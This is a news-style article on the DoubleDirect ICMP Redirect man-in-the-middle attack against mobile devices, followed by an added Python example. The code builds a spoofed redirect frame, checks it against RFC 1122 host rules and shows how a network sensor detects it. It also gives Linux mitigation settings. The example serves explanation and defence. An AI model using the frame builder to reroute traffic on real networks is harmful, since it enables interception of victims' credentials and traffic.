A new attack technique, known as DoubleDirect, enables an attacker to redirect a victim's traffic to the attacker's device. Once the victim's traffic is redirected, the attacker can capture the victim's credentials and deliver malicious payloads to the victim's mobile device that can not only quickly infect the device, but also spread throughout a corporate network.



Mobile security firm Zimperium has detected the attack against the customers of web giants including Google, Facebook, Live.com and Twitter, across 31 countries.



The DoubleDirect attack targets iOS and Android users. According to Zimperium, it does not affect users running Windows or Linux, because those operating systems do not accept the ICMP redirect packets that carry the malicious route change.



Zimperium explains the attack as follows:



DoubleDirect uses ICMP Redirect packets to modify routing tables of a host. This is legitimately used by routers to notify the hosts on the network that a better route is available for a particular destination. However, an attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic to flow via an arbitrary network path for a particular IP.



As a result, the attacker can launch a MitM attack, redirecting the victim's traffic to his device. Once redirected, the attacker can compromise the mobile device by chaining the attack with an additional client-side vulnerability (e.g. a browser vulnerability), and in turn, provide an attacker with access to the corporate network.
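To make the mechanism above concrete, the following is an added example written for this page; it is not Zimperium's code and not the DoubleDirect tool. It builds an ICMP Redirect (type 5) frame from raw bytes, parses it back, applies the RFC 1122 checks a host performs before changing its routing table, and shows why those checks do not stop a LAN attacker who spoofs the gateway's IP address. All MAC and IP addresses, and the function names, are constructed for illustration.

```python
"""
Added example (not Zimperium's code): craft an ICMP Redirect (type 5) frame
as raw bytes, parse it back, run the RFC 1122 host-side acceptance checks,
and show the one signal a LAN sensor can use to spot a spoofed redirect.
All MAC and IP addresses below are constructed for illustration.
"""
import ipaddress
import struct

ICMP_REDIRECT = 5           # ICMP type "Redirect" (RFC 792)
REDIRECT_FOR_HOST = 1       # code 1: redirect datagrams for one destination host
ETHERTYPE_IPV4 = 0x0800


def checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071): one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header with a valid header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_redirect_frame(eth_src: bytes, eth_dst: bytes, ip_src: str, victim: str,
                         new_gateway: str, flow_dst: str) -> bytes:
    """Ethernet + IPv4 + ICMP Redirect.  The ICMP body quotes the IP header and
    first 8 bytes of the datagram that supposedly triggered the redirect; that is
    how the receiver learns WHICH destination the new gateway applies to."""
    quoted = ipv4_header(victim, flow_dst, 6, 8) + b"\x00" * 8   # victim -> flow_dst, TCP
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_FOR_HOST, 0,
                       ipaddress.IPv4Address(new_gateway).packed) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    ip = ipv4_header(ip_src, victim, 1, len(icmp)) + icmp       # protocol 1 = ICMP
    return eth_dst + eth_src + struct.pack("!H", ETHERTYPE_IPV4) + ip


def parse_redirect_frame(frame: bytes):
    """Return the redirect's fields, or None if the frame is not a valid ICMP Redirect."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 1:                                   # not ICMP
        return None
    icmp = ip[ihl:]
    if icmp[0] != ICMP_REDIRECT or checksum(icmp) != 0:  # a correct checksum verifies to 0
        return None
    quoted = icmp[8:]
    return {
        "eth_src": frame[6:12],
        "ip_src": str(ipaddress.IPv4Address(ip[12:16])),
        "code": icmp[1],
        "new_gateway": str(ipaddress.IPv4Address(icmp[4:8])),
        "destination": str(ipaddress.IPv4Address(quoted[16:20])),
    }


def host_accepts(r: dict, current_gateway: str, local_net: str):
    """The RFC 1122 section 3.2.2.2 checks a host performs before updating its
    routing table.  Note that neither check can see a spoofed source address."""
    if r["ip_src"] != current_gateway:
        return False, "not from the current first-hop gateway"
    if ipaddress.IPv4Address(r["new_gateway"]) not in ipaddress.IPv4Network(local_net):
        return False, "new gateway is not on the local network"
    return True, "route for %s now via %s" % (r["destination"], r["new_gateway"])


def monitor_flags_spoof(r: dict, gateway_mac: bytes) -> bool:
    """LAN-side detection: the IP layer claims the gateway sent the redirect, but
    the frame did not come from the gateway's MAC.  The host itself cannot tell;
    a sensor on the segment with a known gateway MAC can."""
    return r["eth_src"] != gateway_mac


if __name__ == "__main__":
    GATEWAY_MAC = bytes.fromhex("020000000001")    # constructed
    ATTACKER_MAC = bytes.fromhex("02000000beef")   # constructed
    VICTIM_MAC = bytes.fromhex("020000000042")     # constructed
    # Attacker on the LAN spoofs the gateway's IP (192.0.2.1) and names itself
    # (192.0.2.66) as the better next hop for the victim's traffic to 198.51.100.10.
    frame = build_redirect_frame(ATTACKER_MAC, VICTIM_MAC, "192.0.2.1", "192.0.2.42",
                                 "192.0.2.66", "198.51.100.10")
    r = parse_redirect_frame(frame)
    print(host_accepts(r, "192.0.2.1", "192.0.2.0/24"))   # accepted: the source looks like the gateway
    print(monitor_flags_spoof(r, GATEWAY_MAC))            # True: the frame came from the wrong MAC
```

The point of the example is the last two lines: the redirect passes every check a host is told to make, because the attacker only has to put the real gateway's IP in the source field, so the victim's route to 198.51.100.10 now points at the attacker. Detecting it after the fact needs something the host does not keep, the Ethernet source of the frame, which is why this is a job for a sensor on the segment. On the host side the reliable fix is to refuse redirects altogether; on Linux that is the accept_redirects and secure_redirects sysctls under net.ipv4.conf, with secure_redirects alone being insufficient here since the spoofed source still matches the gateway.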